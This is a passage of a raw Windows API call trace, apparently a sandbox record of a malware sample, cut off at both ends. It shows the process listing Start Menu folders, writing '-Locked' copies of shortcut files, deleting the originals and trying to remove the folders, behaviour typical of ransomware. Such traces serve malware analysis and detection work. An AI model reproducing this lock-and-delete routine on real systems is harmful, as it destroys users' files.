dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.973] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0299.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0299.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0299.973] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", lpFilePart=0x0) returned 0x4d [0299.973] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpFilePart=0x0) returned 0x4e [0299.973] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf639e71, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf639e71, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.974] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf639e71, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf639e71, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.974] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50379765, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x50379765, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x50379765, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Character Map.lnk", cAlternateFileName="")) returned 1 [0299.974] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf639e71, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9ee2becc, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee2becc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.974] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf639e71, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9ee2becc, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee2becc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0299.975] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0299.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0299.975] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk-Locked", lpFilePart=0x0) returned 0x66 [0299.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0299.975] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.976] GetFileType (hFile=0x49c) returned 0x1 [0299.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0299.976] GetFileType (hFile=0x49c) returned 0x1 [0299.978] CloseHandle (hObject=0x49c) returned 1 [0299.987] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk", lpFilePart=0x0) returned 0x5f [0299.987] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk")) returned 1 [0299.988] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\desktop.ini-Locked", lpFilePart=0x0) returned 0x60 [0299.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0299.988] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.994] GetFileType (hFile=0x49c) returned 0x1 [0299.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0299.994] GetFileType (hFile=0x49c) returned 0x1 [0299.996] CloseHandle (hObject=0x49c) returned 1 [0299.996] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\desktop.ini", lpFilePart=0x0) returned 0x59 [0299.996] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 1 [0299.998] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", lpFilePart=0x0) returned 0x4d [0299.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0299.998] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x33357994, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33357994, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0299.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0299.999] RemoveDirectoryW (lpPathName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools")) returned 0 [0300.001] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", lpFilePart=0x0) returned 0x49 [0300.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.001] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", lpFilePart=0x0) returned 0x49 [0300.001] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpFilePart=0x0) returned 0x4a [0300.001] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.001] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165d136f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x165d136f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x165d136f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Component Services.lnk", cAlternateFileName="")) returned 1 [0300.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11bc23ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11bc23ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11bc23ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Computer Management.lnk", cAlternateFileName="")) returned 1 [0300.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36bf32a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6c530990, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6c530990, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0xa26, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0300.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13838470, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13838470, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13838470, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0x0, dwReserved1=0x0, cFileName="dfrgui.lnk", cAlternateFileName="")) returned 1 [0300.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505b5aa3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x505b5aa3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x505b5aa3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disk Cleanup.lnk", cAlternateFileName="")) returned 1 [0300.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12bb3f15, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12bb3f15, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12bb3f15, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x490, dwReserved0=0x0, dwReserved1=0x0, cFileName="Event Viewer.lnk", cAlternateFileName="")) returned 1 [0300.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16643a7b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16643a7b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16643a7b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x478, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI Initiator.lnk", cAlternateFileName="")) returned 1 [0300.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1375365d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1375365d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1375365d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memory Diagnostics Tool.lnk", cAlternateFileName="")) returned 1 [0300.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb0d81e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bb0d81e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bb0d81e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ODBC Data Sources (32-bit).lnk", cAlternateFileName="")) returned 1 [0300.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1931ddb6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1931ddb6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1931ddb6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ODBC Data Sources (64-bit).lnk", cAlternateFileName="")) returned 1 [0300.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1425a437, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1425a437, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1425a437, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x0, cFileName="Performance Monitor.lnk", cAlternateFileName="")) returned 1 [0300.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37cc46a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37cc46a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37cc46a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print Management.lnk", cAlternateFileName="")) returned 1 [0300.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1425a437, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1425a437, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1425a437, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x454, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource Monitor.lnk", cAlternateFileName="")) returned 1 [0300.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c3a1d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36c3a1d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36c3a1d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security Configuration Management.lnk", cAlternateFileName="")) returned 1 [0300.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12d0b438, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12d0b438, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12d0b438, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0x0, dwReserved1=0x0, cFileName="services.lnk", cAlternateFileName="")) returned 1 [0300.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x142341dc, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x142341dc, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x142341dc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Configuration.lnk", cAlternateFileName="")) returned 1 [0300.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14fe9a0b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14fe9a0b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14fe9a0b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Information.lnk", cAlternateFileName="")) returned 1 [0300.006] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12bb3f15, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12bb3f15, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12bb3f15, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task Scheduler.lnk", cAlternateFileName="")) returned 1 [0300.006] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b137854, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1b137854, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1b137854, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x484, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Firewall with Advanced Security.lnk", cAlternateFileName="")) returned 1 [0300.006] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.006] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.007] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", lpFilePart=0x0) returned 0x49 [0300.007] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpFilePart=0x0) returned 0x4a [0300.007] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.007] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.008] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165d136f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x165d136f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x165d136f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Component Services.lnk", cAlternateFileName="")) returned 1 [0300.008] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11bc23ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11bc23ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11bc23ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Computer Management.lnk", cAlternateFileName="")) returned 1 [0300.008] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36bf32a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6c530990, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6c530990, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0xa26, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0300.008] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13838470, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13838470, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13838470, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0x0, dwReserved1=0x0, cFileName="dfrgui.lnk", cAlternateFileName="")) returned 1 [0300.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: 